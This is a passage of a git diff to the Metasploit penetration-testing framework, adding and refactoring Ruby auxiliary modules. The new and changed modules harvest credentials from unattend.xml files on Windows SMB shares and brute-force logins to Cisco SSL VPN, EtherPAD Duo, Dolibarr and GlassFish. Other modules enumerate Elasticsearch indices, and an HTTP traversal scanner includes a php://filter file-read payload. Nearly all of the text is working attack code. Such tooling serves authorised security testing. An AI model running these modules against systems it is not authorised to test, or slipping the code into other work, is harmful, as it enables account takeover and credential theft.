+    share_path = "\\\\#{rhost}\\#{share}"
+    vprint_status("#{rhost}:#{rport} Enumerating #{share}...")
+
+    begin
+      simple.connect(share_path)
+    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
+      print_error("#{rhost}:#{rport} Could not access share: #{share} - #{e}")
+      return
+    end
+
+    results = simple.client.file_search("\\", /unattend.xml$/i, 10)
+
+    results.each do |file_path|
+      file = simple.open(file_path, 'o').read()
+      next unless file
+
+      loot_unattend(file)
+
+      creds = parse_client_unattend(file)
+      creds.each do |cred|
+        next unless (cred && cred['username'] && cred['password'])
+        next unless cred['username'].to_s.length > 0
+        next unless cred['password'].to_s.length > 0
+
+        report_creds(cred['domain'].to_s, cred['username'], cred['password'])
+        print_good("#{rhost}:#{rport} Credentials: " +
+          "Path=#{share_path}#{file_path} " +
+          "Username=#{cred['domain'].to_s}\\#{cred['username'].to_s} " +
+          "Password=#{cred['password'].to_s}"
+        )
+      end
+    end
+
+  end
+
+  def parse_client_unattend(data)
+
+    begin
+      xml = REXML::Document.new(data)
+    rescue REXML::ParseException => e
+      print_error("Invalid XML format")
+      vprint_line(e.message)
+    end
+    Rex::Parser::Unattend.parse(xml).flatten
+  end
+
+  def loot_unattend(data)
+    return if data.empty?
+    path = store_loot('windows.unattend.raw', 'text/plain', rhost, data, "Windows Deployment Services")
+    print_status("#{rhost}:#{rport} Stored unattend.xml in #{path}")
+  end
+
+  def report_creds(domain, user, pass)
+    report_auth_info(
+      :host  => rhost,
+      :port => 445,
+      :sname => 'smb',
+      :proto => 'tcp',
+      :source_id => nil,
+      :source_type => "aux",
+      :user => "#{domain}\\#{user}",
+      :pass => pass
+    )
+  end
+
+end
+
diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
index 48f17df209..228fda6197 100644
--- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
+++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
         key_md5 = ::Rex::Text.md5(key)
         hash_path = "/#{key_md5[0,1]}/#{key_md5[1,1]}/#{key_md5[2,1]}/#{key_md5}"
         url = normalize_uri(wordpress_url, datastore["WP_CONTENT_DIR"], "/w3tc/dbcache")
-        uri << hash_path
+        url << hash_path
 
         result = nil
         begin
diff --git a/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb
new file mode 100644
index 0000000000..431593cf2c
--- /dev/null
+++ b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb
@@ -0,0 +1,95 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/module/deprecated'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  include Msf::Module::Deprecated
+
+  DEPRECATION_DATE = Date.new(2014, 07, 29)
+  DEPRECATION_REPLACEMENT = 'auxiliary/scanner/elasticsearch/indices_enum'
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'ElasticSearch Indices Enumeration Utility',
+      'Description'  => %q{
+        This module enumerates ElasticSearch Indices. It uses the REST API
+        in order to make it.
+      },
+      'Author'         =>
+        [
+          'Silas Cutler <Silas.Cutler[at]BlackListThisDomain.com>'
+        ],
+      'License'      => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(9200)
+      ], self.class)
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  def run_host(ip)
+    vprint_status("#{peer} - Querying indices...")
+    begin
+      res = send_request_raw({
+        'uri'     => '/_aliases',
+        'method'  => 'GET',
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable
+      vprint_error("#{peer} - Unable to establish connection")
+      return
+    end
+
+    if res && res.code == 200 && res.body.length > 0
+      begin
+        json_body = JSON.parse(res.body)
+      rescue JSON::ParserError
+        vprint_error("#{peer} - Unable to parse JSON")
+        return
+      end
+    else
+      vprint_error("#{peer} - Timeout or unexpected response...")
+      return
+    end
+
+    report_service(
+      :host  => rhost,
+      :port  => rport,
+      :proto => 'tcp',
+      :name  => 'elasticsearch'
+    )
+
+    indices = []
+
+    json_body.each do |index|
+      indices.push(index[0])
+      report_note(
+        :host  => rhost,
+        :port  => rport,
+        :proto => 'tcp',
+        :type  => "elasticsearch.index",
+        :data  => index[0],
+        :update => :unique_data
+      )
+    end
+
+    if indices.length > 0
+      print_good("#{peer} - ElasticSearch Indices found: #{indices.join(", ")}")
+    end
+
+  end
+
+end
diff --git a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb
new file mode 100644
index 0000000000..196d77aec0
--- /dev/null
+++ b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb
@@ -0,0 +1,89 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'ElasticSearch Indices Enumeration Utility',
+      'Description'  => %q{
+        This module enumerates ElasticSearch Indices. It uses the REST API
+        in order to make it.
+      },
+      'Author'         =>
+        [
+          'Silas Cutler <Silas.Cutler[at]BlackListThisDomain.com>'
+        ],
+      'License'      => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(9200)
+      ], self.class)
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  def run_host(ip)
+    vprint_status("#{peer} - Querying indices...")
+    begin
+      res = send_request_raw({
+        'uri'     => '/_aliases',
+        'method'  => 'GET',
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable
+      vprint_error("#{peer} - Unable to establish connection")
+      return
+    end
+
+    if res && res.code == 200 && res.body.length > 0
+      begin
+        json_body = JSON.parse(res.body)
+      rescue JSON::ParserError
+        vprint_error("#{peer} - Unable to parse JSON")
+        return
+      end
+    else
+      vprint_error("#{peer} - Timeout or unexpected response...")
+      return
+    end
+
+    report_service(
+      :host  => rhost,
+      :port  => rport,
+      :proto => 'tcp',
+      :name  => 'elasticsearch'
+    )
+
+    indices = []
+
+    json_body.each do |index|
+      indices.push(index[0])
+      report_note(
+        :host  => rhost,
+        :port  => rport,
+        :proto => 'tcp',
+        :type  => "elasticsearch.index",
+        :data  => index[0],
+        :update => :unique_data
+      )
+    end
+
+    if indices.length > 0
+      print_good("#{peer} - ElasticSearch Indices found: #{indices.join(", ")}")
+    end
+
+  end
+
+end
diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
index 4cd4492430..f60c22c38d 100644
--- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
+++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
 
       if res &&
          res.code == 200 &&
-         res.headers['Set-Cookie'].match(/webvpn/)
+         res.get_cookies.include?('webvpn')
 
         return true
       else
@@ -135,4 +135,4 @@ class Metasploit3 < Msf::Auxiliary
       return :abort
     end
   end
-end
\ No newline at end of file
+end
diff --git a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
index 6d58cb1cae..75c37b5f0b 100644
--- a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
+++ b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
@@ -77,15 +77,15 @@ class Metasploit3 < Msf::Auxiliary
         'method'    => 'GET'
       })
 
-      if (res and res.headers['Set-Cookie'])
+      if res && res.get_cookies
 
-        cookie = res.headers['Set-Cookie'].split('; ')[0]
+        cookie = res.get_cookies
 
         res = send_request_cgi(
         {
           'uri'       => "/help/wwhelp/wwhimpl/common/html/default.htm",
           'method'    => 'GET',
-          'cookie'	   => '#{cookie}'
+          'cookie'	   => cookie
         })
 
         if (res and res.code == 200 and res.body.include?('Cisco IronPort AsyncOS'))
@@ -135,7 +135,7 @@ class Metasploit3 < Msf::Auxiliary
           }
       })
 
-      if (res and res.headers['Set-Cookie'].include?('authenticated='))
+      if res and res.get_cookies.include?('authenticated=')
         print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
         report_hash = {
diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
new file mode 100644
index 0000000000..f759bee9b9
--- /dev/null
+++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb
@@ -0,0 +1,227 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/http'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Cisco SSL VPN Bruteforce Login Utility',
+      'Description'    => %{
+        This module scans for Cisco SSL VPN web login portals and
+        performs login brute force to identify valid credentials.
+      },
+      'Author'         =>
+        [
+          'Jonathan Claudius <jclaudius[at]trustwave.com>'
+        ],
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'USERNAME' => 'cisco',
+          'PASSWORD' => 'cisco'
+        }
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('GROUP', [false, "A specific VPN group to use", ''])
+      ], self.class)
+  end
+
+  def run_host(ip)
+    unless check_conn?
+      vprint_error("#{peer} - Connection failed, Aborting...")
+      return false
+    end
+
+    unless is_app_ssl_vpn?
+      vprint_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.")
+      return false
+    end
+
+    vprint_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.")
+
+    groups = Set.new
+    if datastore['GROUP'].empty?
+      vprint_status("#{peer} - Attempt to Enumerate VPN Groups...")
+      groups = enumerate_vpn_groups
+
+      if groups.empty?
+        vprint_warning("#{peer} - Unable to enumerate groups")
+        vprint_warning("#{peer} - Using the default group: DefaultWEBVPNGroup")
+        groups << "DefaultWEBVPNGroup"
+      else
+        vprint_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}")
+      end
+
+    else
+      groups << datastore['GROUP']
+    end
+    groups << ""
+
+    vprint_status("#{peer} - Starting login brute force...")
+    groups.each do |group|
+      each_user_pass do |user, pass|
+        do_login(user, pass, group)
+      end
+    end
+  end
+
+  # Verify whether the connection is working or not
+  def check_conn?
+    begin
+      res = send_request_cgi('uri' => '/', 'method' => 'GET')
+      vprint_good("#{peer} - Server is responsive...")
+    rescue ::Rex::ConnectionRefused,
+           ::Rex::HostUnreachable,
+           ::Rex::ConnectionTimeout,
+           ::Rex::ConnectionError,
+           ::Errno::EPIPE
+      return
+    end
+  end
+
+  def enumerate_vpn_groups
+    res = send_request_cgi(
+            'uri' => '/+CSCOE+/logon.html',
+            'method' => 'GET',
+          )
+
+    if res &&
+       res.code == 302
+
+      res = send_request_cgi(
+              'uri' => '/+CSCOE+/logon.html',
+              'method' => 'GET',
+              'vars_get' => { 'fcadbadd' => "1" }
+            )
+    end
+
+    groups = Set.new
+    group_name_regex = /<select id="group_list"  name="group_list" style="z-index:1(?:; float:left;)?" onchange="updateLogonForm\(this\.value,{(.*)}/
+
+    if res &&
+       match = res.body.match(group_name_regex)
+
+      group_string = match[1]
+      groups = group_string.scan(/'([\w\-0-9]+)'/).flatten.to_set
+    end
+
+    return groups
+  end
+
+  # Verify whether we're working with SSL VPN or not
+  def is_app_ssl_vpn?
+    res = send_request_cgi(
+            'uri' => '/+CSCOE+/logon.html',
+            'method' => 'GET',
+          )
+
+    if res &&
+       res.code == 302
+
+      res = send_request_cgi(
+              'uri' => '/+CSCOE+/logon.html',
+              'method' => 'GET',
+              'vars_get' => { 'fcadbadd' => "1" }
+            )
+    end
+
+    if res &&
+       res.code == 200 &&
+       res.body.match(/webvpnlogin/)
+
+      return true
+    else
+      return false
+    end
+  end
+
+  def do_logout(cookie)
+    res = send_request_cgi(
+            'uri' => '/+webvpn+/webvpn_logout.html',
+            'method' => 'GET',
+            'cookie'    => cookie
+          )
+  end
+
+  # Brute-force the login page
+  def do_login(user, pass, group)
+    vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}")
+
+    begin
+      cookie = "webvpn=; " +
+               "webvpnc=; " +
+               "webvpn_portal=; " +
+               "webvpnSharePoint=; " +
+               "webvpnlogin=1; " +
+               "webvpnLang=en;"
+
+      post_params = {
+        'tgroup'  => '',
+        'next'    => '',
+        'tgcookieset' => '',
+        'username' => user,
+        'password' => pass,
+        'Login'   => 'Logon'
+      }
+
+      post_params['group_list'] = group unless group.empty?
+
+      resp = send_request_cgi(
+               'uri' => '/+webvpn+/index.html',
+               'method' => 'POST',
+               'ctype' => 'application/x-www-form-urlencoded',
+               'cookie' => cookie,
+               'vars_post' => post_params
+             )
+
+      if resp &&
+         resp.code == 200 &&
+         resp.body.match(/SSL VPN Service/) &&
+         resp.body.match(/webvpn_logout/i)
+
+        print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}")
+
+        do_logout(resp.get_cookies)
+
+        report_hash = {
+          :host   => rhost,
+          :port   => rport,
+          :sname  => 'Cisco SSL VPN',
+          :user   => user,
+          :pass   => pass,
+          :group => group,
+          :active => true,
+          :type => 'password'
+        }
+
+        report_auth_info(report_hash)
+        return :next_user
+
+      else
+        vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}")
+      end
+
+    rescue ::Rex::ConnectionRefused,
+           ::Rex::HostUnreachable,
+           ::Rex::ConnectionTimeout,
+           ::Rex::ConnectionError,
+           ::Errno::EPIPE
+      vprint_error("#{peer} - HTTP Connection Failed, Aborting")
+      return :abort
+    end
+  end
+end
diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb
index 344cf57458..0b0b34a7ee 100644
--- a/modules/auxiliary/scanner/http/crawler.rb
+++ b/modules/auxiliary/scanner/http/crawler.rb
@@ -104,8 +104,8 @@ class Metasploit3 < Msf::Auxiliary
       info[:ctype] = page.headers['content-type']
     end
 
-    if page.headers['set-cookie']
-      info[:cookie] = page.headers['set-cookie']
+    if !page.cookies.empty?
+      info[:cookie] = page.cookies
     end
 
     if page.headers['authorization']
diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb
index 6463d9af62..f1f6807e4a 100644
--- a/modules/auxiliary/scanner/http/dolibarr_login.rb
+++ b/modules/auxiliary/scanner/http/dolibarr_login.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
 
   def initialize(info = {})
     super(update_info(info,
@@ -39,13 +40,13 @@ class Metasploit3 < Msf::Auxiliary
   def get_sid_token
     res = send_request_raw({
       'method' => 'GET',
-      'uri'    => normalize_uri(@uri.path)
+      'uri'    => normalize_uri(@uri)
     })
 
-    return [nil, nil] if not (res and res.headers['Set-Cookie'])
+    return [nil, nil] if res.nil? || res.get_cookies.empty?
 
     # Get the session ID from the cookie
-    m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/)
+    m = get_cookies.match(/(DOLSESSID_.+);/)
     id = (m.nil?) ? nil : m[1]
 
     # Get the token from the decompressed HTTP body response
@@ -62,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
     #
     sid, token = get_sid_token
     if sid.nil? or token.nil?
-      print_error("#{peer} - Unable to obtain session ID or token, cannot continue")
+      vprint_error("#{peer} - Unable to obtain session ID or token, cannot continue")
       return :abort
     else
       vprint_status("#{peer} - Using sessiond ID: #{sid}")
@@ -72,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
     begin
       res = send_request_cgi({
         'method'   => 'POST',
-        'uri'      => normalize_uri("#{@uri.path}index.php"),
+        'uri'      => normalize_uri("#{@uri}index.php"),
         'cookie'   => sid,
         'vars_post' => {
           'token'         => token,
@@ -91,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     if res.nil?
-      print_error("#{peer} - Connection timed out")
+      vprint_error("#{peer} - Connection timed out")
       return :abort
     end
 
@@ -116,8 +117,12 @@ class Metasploit3 < Msf::Auxiliary
 
   def run
     @uri = target_uri.path
-    @uri.path << "/" if @uri.path[-1, 1] != "/"
+    @uri << "/" if @uri[-1, 1] != "/"
 
+    super
+  end
+
+  def run_host(ip)
     each_user_pass { |user, pass|
       vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
       do_login(user, pass)
diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb
new file mode 100644
index 0000000000..66371cc7d1
--- /dev/null
+++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb
@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+    'Name'           => 'EtherPAD Duo Login Bruteforce Utility',
+    'Description'    => %{
+      This module scans for EtherPAD Duo login portal, and
+      performs a login bruteforce attack to identify valid credentials.
+    },
+    'Author'         =>
+      [
+        'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
+      ],
+    'License'        => MSF_LICENSE
+    ))
+
+  end
+
+  def run_host(ip)
+    unless is_app_epaduo?
+      return
+    end
+
+    print_status("#{peer} - Starting login bruteforce...")
+    each_user_pass do |user, pass|
+      do_login(user, pass)
+    end
+  end
+
+  #
+  # What's the point of running this module if the target actually isn't EtherPAD Duo
+  #
+
+  def is_app_epaduo?
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => normalize_uri('/', 'CGI', 'mParseCGI'),
+        'method'    => 'GET',
+        'vars_get'  => {
+          'file' => 'mainpage.html'
+        }
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      vprint_error("#{peer} - HTTP Connection Failed...")
+      return false
+    end
+
+    if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo"))
+      vprint_good("#{peer} - Running EtherPAD Duo application ...")
+      return true
+    else
+      vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.")
+      return false
+    end
+  end
+
+  #
+  # Brute-force the login page
+  #
+
+  def do_login(user, pass)
+    vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => normalize_uri('/', 'config', 'configindex.ehtml'),
+        'method'    => 'GET',
+        'authorization' => basic_auth(user, pass)
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      vprint_error("#{peer} - HTTP Connection Failed...")
+      return :abort
+    end
+
+    if res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("EtherPAD")
+      print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+      report_hash = {
+        :host   => rhost,
+        :port   => rport,
+        :sname  => 'EtherPAD Duo Portal',
+        :user   => user,
+        :pass   => pass,
+        :active => true,
+        :type => 'password'
+      }
+      report_auth_info(report_hash)
+      return :next_user
+    else
+      vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
+    end
+  end
+end
diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb
index aa2dab6a0b..7801400f3e 100644
--- a/modules/auxiliary/scanner/http/glassfish_login.rb
+++ b/modules/auxiliary/scanner/http/glassfish_login.rb
@@ -167,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary
       print_status("Trying credential GlassFish 2.x #{user}:'#{pass}'....")
       res = try_login(user,pass)
       if res and res.code == 302
-        session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
+        session = $1 if res && res.get_cookies =~ /JSESSIONID=(.*); /i
         res = send_request('/applications/upload.jsf', 'GET', session)
 
         p = /<title>Deploy Enterprise Applications\/Modules/
@@ -180,7 +180,7 @@ class Metasploit3 < Msf::Auxiliary
       print_status("Trying credential GlassFish 3.x #{user}:'#{pass}'....")
       res = try_login(user,pass)
       if res and res.code == 302
-        session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
+        session = $1 if res && res.get_cookies =~ /JSESSIONID=(.*); /i
         res = send_request('/common/applications/uploadFrame.jsf', 'GET', session)
 
         p = /<title>Deploy Applications or Modules/
diff --git a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
index 360c344f0e..e6a952ae97 100644
--- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
+++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
 
   def initialize(info={})
     super(update_info(info,
@@ -55,11 +56,11 @@ class Metasploit3 < Msf::Auxiliary
       })
 
       if not res
-        print_error("#{peer} - Connection timed out")
+        vprint_error("#{peer} - Connection timed out")
         return :abort
       end
     rescue ::Rex::ConnectionError, Errno::ECONNREFUSED
-      print_error("#{peer} - Failed to response")
+      vprint_error("#{peer} - Failed to response")
       return :abort
     end
 
@@ -79,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
 
-  def run
+  def run_host(ip)
     if anonymous_access?
       print_status("#{peer} - No login necessary. Server allows anonymous access.")
       return
diff --git a/modules/auxiliary/scanner/http/http_header.rb b/modules/auxiliary/scanner/http/http_header.rb
index 42e385249c..b310e76a0c 100644
--- a/modules/auxiliary/scanner/http/http_header.rb
+++ b/modules/auxiliary/scanner/http/http_header.rb
@@ -76,12 +76,12 @@ class Metasploit3 < Msf::Auxiliary
       header_string = "#{h[0]}: #{h[1]}"
       print_status "#{peer}: #{header_string}"
 
-      report_note({
-        :type => 'HTTP header',
+      report_note(
+        :type => "http.header.#{rport}.#{counter}",
         :data => header_string,
         :host => ip,
         :port => rport
-      })
+      )
       counter = counter + 1
     end
     if counter == 0
diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb
index d489e7aab4..d7fe81ab4b 100644
--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary
       1.upto(depth) do |d|
         file_to_read.each do |f|
           trigger = base * d
-          p = datastore['PATH'] + trigger + f
+          p = normalize_uri(datastore['PATH']) + trigger + f
           req = ini_request(p)
           vprint_status("Trying: http://#{rhost}:#{rport}#{p}")
           res = send_request_cgi(req, 25)
@@ -187,7 +187,7 @@ class Metasploit3 < Msf::Auxiliary
     if datastore['TRIGGER'].empty?
       # Found trigger using fuzz()
       found = true if trigger
-      uri = datastore['PATH'] + trigger
+      uri = normalize_uri(datastore['PATH']) + trigger
     else
       # Manual check. meh.
       if datastore['FILE'].empty?
@@ -195,7 +195,7 @@ class Metasploit3 < Msf::Auxiliary
         return
       end
 
-      uri = datastore['PATH'] + trigger + datastore['FILE']
+      uri = normalize_uri(datastore['PATH']) + trigger + datastore['FILE']
       req = ini_request(uri)
       vprint_status("Trying: http://#{rhost}:#{rport}#{uri}")
       res = send_request_cgi(req, 25)
@@ -211,7 +211,7 @@ class Metasploit3 < Msf::Auxiliary
         :port     => rport,
         :vhost    => datastore['VHOST'],
         :path     => uri,
-        :params   => datastore['PATH'],
+        :params   => normalize_uri(datastore['PATH']),
         :pname    => trigger,
         :risk     => 3,
         :proof    => trigger,
@@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary
       # Our trigger already puts us in '/', so our filename doesn't need to begin with that
       f = f[1,f.length] if f =~ /^\//
 
-      req = ini_request(uri = (datastore['PATH'] + trigger + f).chop)
+      req = ini_request(uri = (normalize_uri(datastore['PATH']) + trigger + f).chop)
       res = send_request_cgi(req, 25)
 
       vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res
@@ -261,7 +261,7 @@ class Metasploit3 < Msf::Auxiliary
       # Our trigger already puts us in '/', so our filename doesn't need to begin with that
       f = f[1,f.length] if f =~ /^\//
 
-      req = ini_request(uri = (datastore['PATH'] + "php://filter/read=convert.base64-encode/resource=" + f).chop)
+      req = ini_request(uri = (normalize_uri(datastore['PATH']) + "php://filter/read=convert.base64-encode/resource=" + f).chop)
       res = send_request_cgi(req, 25)
 
       vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res
@@ -294,7 +294,7 @@ class Metasploit3 < Msf::Auxiliary
 
     # Form the PUT request
     fname = Rex::Text.rand_text_alpha(rand(5) + 5) + '.txt'
-    uri = datastore['PATH'] + trigger + fname
+    uri = normalize_uri(datastore['PATH']) + trigger + fname
     vprint_status("Attempt to upload to: http://#{rhost}:#{rport}#{uri}")
     req = ini_request(uri)
 
@@ -331,14 +331,10 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    # Make sure datastore['PATH] begins with a '/'
-    if datastore['PATH'] !~ /^\//
-      datastore['PATH'] = '/' + datastore['PATH']
+    # Warn if it's not a well-formed UPPERCASE method
+    if datastore['METHOD'] !~ /^[A-Z]+$/
+      print_warning("HTTP method #{datastore['METHOD']} is not Apache-compliant. Try only UPPERCASE letters.")
     end
-
-    # Some webservers (ie. Apache) might not like the HTTP method to be lower-case
-    datastore['METHOD'] = datastore['METHOD'].upcase
-
     print_status("Running action: #{action.name}...")
 
     # And it's..... "SHOW TIME!!"
diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb
index 5f5b2ebbe7..d3dcc68fc1 100644
--- a/modules/auxiliary/scanner/http/jenkins_enum.rb
+++ b/modules/auxiliary/scanner/http/jenkins_enum.rb
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     version = res.headers['X-Jenkins']
-    vprint_status("#{peer} - Jenkins Version - #{version}")
+    print_status("#{peer} - Jenkins Version - #{version}")
     report_service(
       :host  => rhost,
       :port  => rport,
@@ -120,17 +120,17 @@ class Metasploit3 < Msf::Auxiliary
         )
       end
     when 403
-      vprint_status("#{peer} - #{uri_path} restricted (403)")
+      print_status("#{peer} - #{uri_path} restricted (403)")
     when 401
-      vprint_status("#{peer} - #{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}")
+      print_status("#{peer} - #{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}")
     when 404
-      vprint_status("#{peer} - #{uri_path} not found (404)")
+      print_status("#{peer} - #{uri_path} not found (404)")
     when 301
-      vprint_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")
+      print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")
     when 302
-      vprint_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")
+      print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")
     else
-      vprint_status("#{peer} - #{uri_path} Don't know how to handle response code #{res.code}")
+      print_status("#{peer} - #{uri_path} Don't know how to handle response code #{res.code}")
     end
   end
 
diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb
index efd73beac0..f2193c5b7f 100644
--- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb
+++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb
@@ -76,4 +76,4 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb
index a55c173a17..62fe258b46 100644
--- a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb
@@ -64,7 +64,7 @@ class Metasploit4 < Msf::Auxiliary
       }
     })
 
-    if res and res.code == 200 and res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /([^\s]*session)=([a-z0-9]+)/
+    if res && res.code == 200 && res.get_cookies =~ /([^\s]*session)=([a-z0-9]+)/
       return $1,$2
     else
       return nil
